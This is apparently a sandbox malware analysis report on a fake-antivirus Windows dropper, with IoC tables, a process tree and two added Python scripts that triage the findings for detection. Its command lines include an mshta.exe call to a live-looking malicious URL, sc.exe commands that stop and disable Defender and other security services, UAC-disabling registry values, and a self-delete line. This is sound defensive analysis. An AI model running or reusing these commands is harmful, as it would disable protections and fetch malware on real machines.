Analysis
max time kernel: 150s
max time network: 127s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19/08/2024, 19:07
Static task: static1
Behavioral task behavioral1: sample 70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe, resource win7-20240704-en
Behavioral task behavioral2: sample 70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe, resource win10v2004-20240802-en
General
Target: 70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe
Size: 2.1MB
MD5: ac2bf4a9c78fa484d14d45ebb20bb63d
SHA1: 0f2164ff2bfd617e2d37e847541a1ed7aacafe94
SHA256: 70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2
SHA512: 6a8191e115e8b99424cdaa0ade7b148c14782dfbea981692a106e6b66ae1dae474bae37571b542ae5992d263851f292f7731f3449750c6bbd2bde260671323bd
SSDEEP: 49152:DIqjmpWdn49S5w+z4BYAiaxs6v5fZ3RyGw0cobvZxC7yciIB:DBmpWdn4ww+z4mu5fNAGw0ZVEyciIB
Malware Config
Extracted
http://galaint.online-secure-pay.info/?0=112&1=3&2=1&3=31&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=iurskupcoc&14=1
Signatures
UAC bypass 3 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Protector-vrhp.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | Protector-vrhp.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | Protector-vrhp.exe
Disables taskbar notifications via registry modification
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
A Debugger value under an image's IFEO key makes Windows start that "debugger" in place of the image, so each tool given a Debugger value below is replaced by svchost.exe and never runs. All keys are under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options, written IFEO below.
description | ioc | Process
Key created | IFEO\w32dsm89.exe | Protector-vrhp.exe
Key created | IFEO\ashAvast.exe | Protector-vrhp.exe
Key created | IFEO\avwupd32.exe | Protector-vrhp.exe
Set value (str) | IFEO\BDSurvey.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\lnetinfo.exe | Protector-vrhp.exe
Set value (str) | IFEO\ollydbg.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Set value (str) | IFEO\avkwctl9.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Set value (str) | IFEO\cfinet.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\platin.exe | Protector-vrhp.exe
Set value (str) | IFEO\start.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\zonalm2601.exe | Protector-vrhp.exe
Key created | IFEO\agentsvr.exe | Protector-vrhp.exe
Set value (str) | IFEO\mpftray.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\nstask32.exe | Protector-vrhp.exe
Key created | IFEO\PskSvc.exe | Protector-vrhp.exe
Key created | IFEO\titanin.exe | Protector-vrhp.exe
Key created | IFEO\mfweng3.02d30.exe | Protector-vrhp.exe
Set value (str) | IFEO\oaui.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\_avp32.exe | Protector-vrhp.exe
Key created | IFEO\MalwareRemoval.exe | Protector-vrhp.exe
Set value (str) | IFEO\AntivirusXP.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Set value (str) | IFEO\ashServ.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\avxmonitornt.exe | Protector-vrhp.exe
Key created | IFEO\JsRcGen.exe | Protector-vrhp.exe
Key created | IFEO\securitysoldier.exe | Protector-vrhp.exe
Set value (str) | IFEO\smc.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\ccSvcHst.exe | Protector-vrhp.exe
Key created | IFEO\window.exe | Protector-vrhp.exe
Set value (str) | IFEO\platin.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\ppinupdt.exe | Protector-vrhp.exe
Set value (str) | IFEO\sbserv.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Set value (str) | IFEO\cfpupdat.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Set value (str) | IFEO\inetlnfo.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\npfmessenger.exe | Protector-vrhp.exe
Key created | IFEO\upgrad.exe | Protector-vrhp.exe
Set value (str) | IFEO\AntivirusPlus\Debugger = "svchost.exe" | Protector-vrhp.exe
Set value (str) | IFEO\ashPopWz.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\cssconfg.exe | Protector-vrhp.exe
Key created | IFEO\frw.exe | Protector-vrhp.exe
Set value (str) | IFEO\processmonitor.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\normist.exe | Protector-vrhp.exe
Key created | IFEO\stcloader.exe | Protector-vrhp.exe
Set value (str) | IFEO\aswRegSvr.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\bundle.exe | Protector-vrhp.exe
Set value (str) | IFEO\ctrl.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\install[5].exe | Protector-vrhp.exe
Key created | IFEO\mslaugh.exe | Protector-vrhp.exe
Set value (str) | IFEO\ldpromenu.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\msconfig | Protector-vrhp.exe
Set value (str) | IFEO\WebProxy.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\ackwin32.exe | Protector-vrhp.exe
Key created | IFEO\atguard.exe | Protector-vrhp.exe
Key created | IFEO\avxquar.exe | Protector-vrhp.exe
Set value (str) | IFEO\fsaa.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\init.exe | Protector-vrhp.exe
Set value (str) | IFEO\teekids.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Set value (str) | IFEO\bpc.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\cfplogvw.exe | Protector-vrhp.exe
Set value (str) | IFEO\pcscan.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\scan32.exe | Protector-vrhp.exe
Set value (str) | IFEO\snetcfg.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Key created | IFEO\ldnetmon.exe | Protector-vrhp.exe
Set value (str) | IFEO\rav7win.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Set value (str) | IFEO\safeweb.exe\Debugger = "svchost.exe" | Protector-vrhp.exe
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | 70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe
Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | 4vvp77et9k06cow.exe
Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | cn86j85204q2lk6.exe
Executes dropped EXE 3 IoCs
pid | Process
4572 | 4vvp77et9k06cow.exe
724 | cn86j85204q2lk6.exe
5004 | Protector-vrhp.exe
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-vrhp.exe" | Protector-vrhp.exe
Checks whether UAC is enabled 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Protector-vrhp.exe
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
Drops file in System32 directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\services.msc | Protector-vrhp.exe
File opened for modification | C:\Windows\SysWOW64\eventvwr.msc | Protector-vrhp.exe
File opened for modification | C:\Windows\SysWOW64\diskmgmt.msc | Protector-vrhp.exe
Launches sc.exe 8 IoCs
sc.exe is the Windows utility for controlling services; here it is used to stop and disable security-product services.
pid | Process
3188 | sc.exe
2256 | sc.exe
1868 | sc.exe
4864 | sc.exe
1852 | sc.exe
756 | sc.exe
2112 | sc.exe
1608 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe (8 occurrences)
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 4vvp77et9k06cow.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cn86j85204q2lk6.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Protector-vrhp.exe
Modifies Internet Explorer settings 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ERROR_PAGE_BYPASS_ZONE_CHECK_FOR_HTTPS_KB954312 | Protector-vrhp.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ERROR_PAGE_BYPASS_ZONE_CHECK_FOR_HTTPS_KB954312\iexplore.exe = "1" | Protector-vrhp.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
5004 | Protector-vrhp.exe (64 occurrences)
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 724 | cn86j85204q2lk6.exe
Token: SeShutdownPrivilege | 724 | cn86j85204q2lk6.exe
Token: SeDebugPrivilege | 5004 | Protector-vrhp.exe
Token: SeShutdownPrivilege | 5004 | Protector-vrhp.exe
Suspicious use of FindShellTrayWindow 4 IoCs
pid | Process
5004 | Protector-vrhp.exe (4 occurrences)
Suspicious use of SendNotifyMessage 4 IoCs
pid | Process
5004 | Protector-vrhp.exe (4 occurrences)
Suspicious use of SetWindowsHookEx 6 IoCs
pid | Process
724 | cn86j85204q2lk6.exe
5004 | Protector-vrhp.exe (5 occurrences)
Suspicious use of WriteProcessMemory 39 IoCs
Each source/target pair was recorded three times; the table lists each pair once.
source pid | source Process | target pid | procid_target
1456 | 70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe | 4572 | 86
4572 | 4vvp77et9k06cow.exe | 724 | 87
724 | cn86j85204q2lk6.exe | 5004 | 89
724 | cn86j85204q2lk6.exe | 1192 | 90
5004 | Protector-vrhp.exe | 220 | 92
5004 | Protector-vrhp.exe | 4864 | 101
5004 | Protector-vrhp.exe | 1852 | 102
5004 | Protector-vrhp.exe | 756 | 103
5004 | Protector-vrhp.exe | 1868 | 105
5004 | Protector-vrhp.exe | 2256 | 107
5004 | Protector-vrhp.exe | 3188 | 108
5004 | Protector-vrhp.exe | 1608 | 109
5004 | Protector-vrhp.exe | 2112 | 111
System policy modification 1 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Protector-vrhp.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Protector-vrhp.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | Protector-vrhp.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | Protector-vrhp.exe
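The registry IoCs above (IFEO Debugger values, the Policies\System UAC values, the Run key and the Geo\Nation and NLS\Language reads) can be triaged mechanically. The following Python is an added example, not part of this report or of tria.ge: it parses IoC lines in the form the report prints them and maps each to a finding with an ATT&CK technique. The sample lines are copied from this page; the severity labels and the technique mapping are the example's own choices.

```python
"""Added example: map the registry IoC lines printed in this report to ATT&CK findings."""
import re
from collections import namedtuple
from typing import Iterable, List, Optional

Finding = namedtuple('Finding', 'severity technique subject detail process')

# Constructed input: registry IoCs copied from this page, in the
# '<operation> <key path>[ = "<data>"] <process>' form the report prints them in.
SAMPLE_IOCS = [
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe Protector-vrhp.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ollydbg.exe\Debugger = "svchost.exe" Protector-vrhp.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smc.exe\Debugger = "svchost.exe" Protector-vrhp.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-vrhp.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-vrhp.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-vrhp.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-vrhp.exe" Protector-vrhp.exe',
    r'Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation cn86j85204q2lk6.exe',
    r'Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe',
]

IOC_RE = re.compile(
    r'^(?P<op>Key created|Key opened|Key value queried|Set value \((?:int|str)\)) '
    r'(?P<path>\\REGISTRY\\.+?)'   # key path, may contain spaces ("Windows NT", "Control Panel")
    r'(?: = "(?P<data>[^"]*)")?'    # quoted data, present only for Set value
    r' (?P<proc>\S+)$'              # the acting process is always the last token
)

# Policies\System values that weaken or switch off UAC (value name -> (data, meaning)).
UAC_WEAKENING = {
    'enablelua': ('0', 'UAC switched off entirely; takes effect at the next reboot'),
    'consentpromptbehavioradmin': ('0', 'administrators elevate without any prompt'),
    'consentpromptbehavioruser': ('0', 'standard users are silently denied elevation'),
}
SEVERITY_ORDER = {'high': 0, 'medium': 1, 'low': 2, 'info': 3}

def classify(line: str) -> Optional[Finding]:
    """Turn one IoC line into a Finding, or None when the key is not one we care about."""
    m = IOC_RE.match(line)
    if not m:
        raise ValueError(f'unrecognised IoC line: {line!r}')
    op, path, data, proc = m.group('op', 'path', 'data', 'proc')
    parts = path.split('\\')
    low = [p.lower() for p in parts]
    leaf = parts[-1]
    is_set = op.startswith('Set value')

    if 'image file execution options' in low:
        idx = low.index('image file execution options')
        target = parts[idx + 1] if idx + 1 < len(parts) else ''
        if is_set and leaf.lower() == 'debugger':
            # The loader starts <data> instead of <target>; with svchost.exe the tool simply never runs.
            return Finding('high', 'T1546.012 IFEO injection', target, f'Debugger for {target} set to {data}', proc)
        if op == 'Key created' and target:
            return Finding('low', 'T1546.012 IFEO injection', target, f'IFEO key created for {target} (no Debugger value yet)', proc)

    if is_set and low[-3:-1] == ['policies', 'system'] and leaf.lower() in UAC_WEAKENING:
        expected, meaning = UAC_WEAKENING[leaf.lower()]
        if data == expected:
            return Finding('high', 'T1548.002 Bypass UAC', leaf, f'{leaf}={data}: {meaning}', proc)

    if is_set and len(low) >= 2 and low[-2] in ('run', 'runonce'):
        from_user_dir = any(t in (data or '').lower() for t in ('appdata', 'temp', 'programdata'))
        return Finding('high' if from_user_dir else 'medium', 'T1547.001 Run key', leaf, f'{parts[-2]}\\{leaf} -> {data}', proc)

    if leaf.lower() == 'nation' and 'geo' in low:
        return Finding('info', 'T1614 System Location Discovery', leaf, 'Geo\\Nation read, possible geofence', proc)
    if leaf.lower() == 'language' and 'nls' in low:
        return Finding('info', 'T1614.001 System Language Discovery', leaf, 'NLS\\Language read', proc)
    return None

def triage(lines: Iterable[str]) -> List[Finding]:
    """Classify every line and return the findings, most severe first."""
    findings = [f for f in map(classify, lines) if f is not None]
    return sorted(findings, key=lambda f: (SEVERITY_ORDER[f.severity], f.technique, f.subject))

if __name__ == '__main__':
    for f in triage(SAMPLE_IOCS):
        print(f'[{f.severity:5}] {f.technique:36} {f.detail}  ({f.process})')
```

IFEO entries that only create a key are rated low because no Debugger value was written there, but the sample still touched them, so the full list of 64 names belongs in a hunt. The two ConsentPromptBehavior values are moot once EnableLUA is 0, yet they show intent; and because EnableLUA only takes effect after a restart, UAC was still enforced for the rest of this sandbox run.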
Processes
PID 1456  C:\Users\Admin\AppData\Local\Temp\70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe"
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID 4572  C:\Users\Admin\AppData\Local\Temp\RarSFX0\4vvp77et9k06cow.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\4vvp77et9k06cow.exe" -e -p4dd2wgad9575xn4
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID 724  C:\Users\Admin\AppData\Local\Temp\RarSFX1\cn86j85204q2lk6.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX1\cn86j85204q2lk6.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID 5004  C:\Users\Admin\AppData\Roaming\Protector-vrhp.exe
        command line: C:\Users\Admin\AppData\Roaming\Protector-vrhp.exe
        - UAC bypass
        - Event Triggered Execution: Image File Execution Options Injection
        - Executes dropped EXE
        - Adds Run key to start application
        - Checks whether UAC is enabled
        - Drops file in System32 directory
        - System Location Discovery: System Language Discovery
        - Modifies Internet Explorer settings
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        - System policy modification
        PID 220  C:\Windows\SysWOW64\mshta.exe
          command line: mshta.exe "http://galaint.online-secure-pay.info/?0=112&1=3&2=1&3=31&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=iurskupcoc&14=1"
          - System Location Discovery: System Language Discovery
        PID 4864  C:\Windows\SysWOW64\sc.exe
          command line: sc stop WinDefend
          - Launches sc.exe
          - System Location Discovery: System Language Discovery
        PID 1852  C:\Windows\SysWOW64\sc.exe
          command line: sc config WinDefend start= disabled
          - Launches sc.exe
          - System Location Discovery: System Language Discovery
        PID 756  C:\Windows\SysWOW64\sc.exe
          command line: sc stop msmpsvc
          - Launches sc.exe
          - System Location Discovery: System Language Discovery
        PID 1868  C:\Windows\SysWOW64\sc.exe
          command line: sc config msmpsvc start= disabled
          - Launches sc.exe
          - System Location Discovery: System Language Discovery
        PID 2256  C:\Windows\SysWOW64\sc.exe
          command line: sc config ekrn start= disabled
          - Launches sc.exe
          - System Location Discovery: System Language Discovery
        PID 3188  C:\Windows\SysWOW64\sc.exe
          command line: sc stop AntiVirService
          - Launches sc.exe
          - System Location Discovery: System Language Discovery
        PID 1608  C:\Windows\SysWOW64\sc.exe
          command line: sc config AntiVirService start= disabled
          - Launches sc.exe
          - System Location Discovery: System Language Discovery
        PID 2112  C:\Windows\SysWOW64\sc.exe
          command line: sc config AntiVirSchedulerService start= disabled
          - Launches sc.exe
          - System Location Discovery: System Language Discovery
      PID 1192  C:\Windows\SysWOW64\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\CN86J8~1.EXE" >> NUL
        - System Location Discovery: System Language Discovery
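The process tree is what a host-based detection would key on: Protector-vrhp.exe (PID 5004) spawning eight sc.exe instances against WinDefend, msmpsvc, ekrn, AntiVirService and AntiVirSchedulerService, mshta.exe fetching the extracted URL, and cmd.exe deleting the previous stage out of the RarSFX1 directory. The following Python is an added example, not from the report or from tria.ge: it rebuilds the tree from (pid, ppid, image, cmdline) records constructed from this page, flags those behaviours, and prints each finding with its ancestry. The vendor attribution of the service names and the ATT&CK IDs are the example's own mapping.

```python
"""Added example: triage a sandbox process tree for defense impairment and LOLBin use."""
import ntpath
import re
from collections import namedtuple
from typing import Dict, List, Optional
from urllib.parse import urlsplit

Proc = namedtuple('Proc', 'pid ppid image cmdline')
TreeFinding = namedtuple('TreeFinding', 'pid technique subject detail')

# Constructed input: the process tree on this page (PIDs, images and command lines as listed).
TEMP = r'C:\Users\Admin\AppData\Local\Temp'
SC = r'C:\Windows\SysWOW64\sc.exe'
SAMPLE_TREE = [Proc(*row) for row in [
    (1456, 0, TEMP + r'\70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe',
     '"' + TEMP + r'\70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe"'),
    (4572, 1456, TEMP + r'\RarSFX0\4vvp77et9k06cow.exe', '"' + TEMP + r'\RarSFX0\4vvp77et9k06cow.exe" -e -p4dd2wgad9575xn4'),
    (724, 4572, TEMP + r'\RarSFX1\cn86j85204q2lk6.exe', '"' + TEMP + r'\RarSFX1\cn86j85204q2lk6.exe"'),
    (5004, 724, r'C:\Users\Admin\AppData\Roaming\Protector-vrhp.exe', r'C:\Users\Admin\AppData\Roaming\Protector-vrhp.exe'),
    (220, 5004, r'C:\Windows\SysWOW64\mshta.exe', 'mshta.exe "http://galaint.online-secure-pay.info/?0=112&1=3&2=1&3=31'
     '&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=iurskupcoc&14=1"'),
    (4864, 5004, SC, 'sc stop WinDefend'),
    (1852, 5004, SC, 'sc config WinDefend start= disabled'),
    (756, 5004, SC, 'sc stop msmpsvc'),
    (1868, 5004, SC, 'sc config msmpsvc start= disabled'),
    (2256, 5004, SC, 'sc config ekrn start= disabled'),
    (3188, 5004, SC, 'sc stop AntiVirService'),
    (1608, 5004, SC, 'sc config AntiVirService start= disabled'),
    (2112, 5004, SC, 'sc config AntiVirSchedulerService start= disabled'),
    (1192, 724, r'C:\Windows\SysWOW64\cmd.exe', r'"C:\Windows\system32\cmd.exe" /c del "' + TEMP + r'\RarSFX1\CN86J8~1.EXE" >> NUL'),
]]

# Services of the security products this sample targets: Microsoft Defender (WinDefend), the Microsoft
# antimalware service (MsMpSvc), ESET (ekrn) and Avira (AntiVirService, AntiVirSchedulerService).
# Windows service names are case-insensitive, so everything is compared lower-cased.
SECURITY_SERVICES = {'windefend', 'msmpsvc', 'ekrn', 'antivirservice', 'antivirschedulerservice'}

SC_RE = re.compile(r'^\s*"?(?:.*\\)?sc(?:\.exe)?"?\s+(stop|config|delete)\s+(\S+)(?:\s+start=\s*(\S+))?', re.I)
URL_RE = re.compile(r'https?://[^\s"\']+', re.I)
DEL_RE = re.compile(r'\bdel\s+(?:"([^"]+)"|(\S+))', re.I)

def check_sc(p: Proc) -> Optional[TreeFinding]:
    """sc.exe stopping, disabling or deleting a security-product service (T1562.001)."""
    m = SC_RE.match(p.cmdline)
    if not m or m.group(2).lower() not in SECURITY_SERVICES:
        return None
    verb, svc, start = m.group(1).lower(), m.group(2), (m.group(3) or '').lower()
    if verb == 'config' and start != 'disabled':
        return None  # e.g. "start= auto" restores rather than impairs
    what = {'stop': 'stops', 'config': 'disables start of', 'delete': 'deletes'}[verb]
    return TreeFinding(p.pid, 'T1562.001 Disable or Modify Tools', svc, f'sc.exe {what} service {svc}')

def check_mshta(p: Proc) -> Optional[TreeFinding]:
    """mshta.exe given a URL: a signed binary fetching and running remote script (T1218.005)."""
    m = URL_RE.search(p.cmdline) if ntpath.basename(p.image).lower() == 'mshta.exe' else None
    if not m:
        return None
    host = urlsplit(m.group(0)).hostname or m.group(0)
    return TreeFinding(p.pid, 'T1218.005 Mshta', host, f'mshta.exe runs remote content from {host}')

def check_delete(p: Proc, by_pid: Dict[int, Proc]) -> Optional[TreeFinding]:
    """cmd /c del ...; called self-deletion when the target sits in the parent image's directory."""
    m = DEL_RE.search(p.cmdline) if ntpath.basename(p.image).lower() == 'cmd.exe' else None
    if not m:
        return None
    target = m.group(1) or m.group(2)
    parent = by_pid.get(p.ppid)
    same_dir = parent is not None and ntpath.dirname(target).lower() == ntpath.dirname(parent.image).lower()
    note = '; same directory as the parent image, so the dropper stage deletes itself' if same_dir else ''
    return TreeFinding(p.pid, 'T1070.004 File Deletion', target, f'cmd.exe deletes {ntpath.basename(target)}{note}')

def check_sfx_stage(p: Proc) -> Optional[TreeFinding]:
    """RarSFX<n> under %TEMP% is where a WinRAR self-extracting archive unpacks before running its payload."""
    if any(part.startswith('rarsfx') for part in p.image.lower().split('\\')):
        return TreeFinding(p.pid, 'SFX stage', ntpath.basename(p.image), f'runs from SFX extraction directory {ntpath.dirname(p.image)}')
    return None

def lineage(pid: int, by_pid: Dict[int, Proc]) -> List[str]:
    """Image basenames from the root of the tree down to pid (loop-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(ntpath.basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]

def triage_tree(procs: List[Proc]) -> List[TreeFinding]:
    by_pid = {p.pid: p for p in procs}
    checks = (check_sfx_stage, check_sc, check_mshta, lambda p: check_delete(p, by_pid))
    return [f for p in procs for f in (c(p) for c in checks) if f is not None]

if __name__ == '__main__':
    by_pid = {p.pid: p for p in SAMPLE_TREE}
    for f in triage_tree(SAMPLE_TREE):
        print(f'PID {f.pid:<5} {f.technique:34} {f.detail}\n      via ' + ' > '.join(lineage(f.pid, by_pid)))
```

Eight sc.exe children of one unsigned parent in AppData\Roaming, all aimed at security-product services, plus an mshta.exe beacon to the extracted URL, is the pattern to alert on. A rule on `sc config ... start= disabled` alone also fires on administrators, so correlate on the parent process and on the service names rather than on the command verb.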
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2): Windows Service (2)
- Event Triggered Execution (1): Image File Execution Options Injection (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2): Windows Service (2)
- Event Triggered Execution (1): Image File Execution Options Injection (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Impair Defenses (2): Disable or Modify Tools (1)
- Indicator Removal (1): File Deletion (1)
- Modify Registry (4)
Downloads
Filesize: 2.0MB
MD5: d2d1c9c8bb295f187be0cda58d303bbb
SHA1: 90963d63b1068613053acb0f1f2a7ea8ae4bee83
SHA256: af6d0ae360a122ff23b5b3e8ef36176b3697eb0710852ff075e3014b360d8733
SHA512: 835693f8414f90a232b0b585a9748ddaa450f76c0b25e98cea44799a2413fc69519e4bf6fb08d090056e6df86c4c107971a8dae8f996d2e9373131c235b6d307
Filesize: 1.9MB
MD5: ca5c540f357be8a95512d23fed022883
SHA1: 0122533984c6b90856f1b39c6e5332c0a80e18f0
SHA256: 6dc40b6231fef0ddd7533646f3b3a592f6258998a010b519efbf3892d95ba476
SHA512: 5129db04faecd4459cc771ec5353e1dd9f5bf584ed190d3178898446644efac93688f6fa1e20690d1208b1494c57af9ec315a78d43fef4d576eb4de3bad4d9b0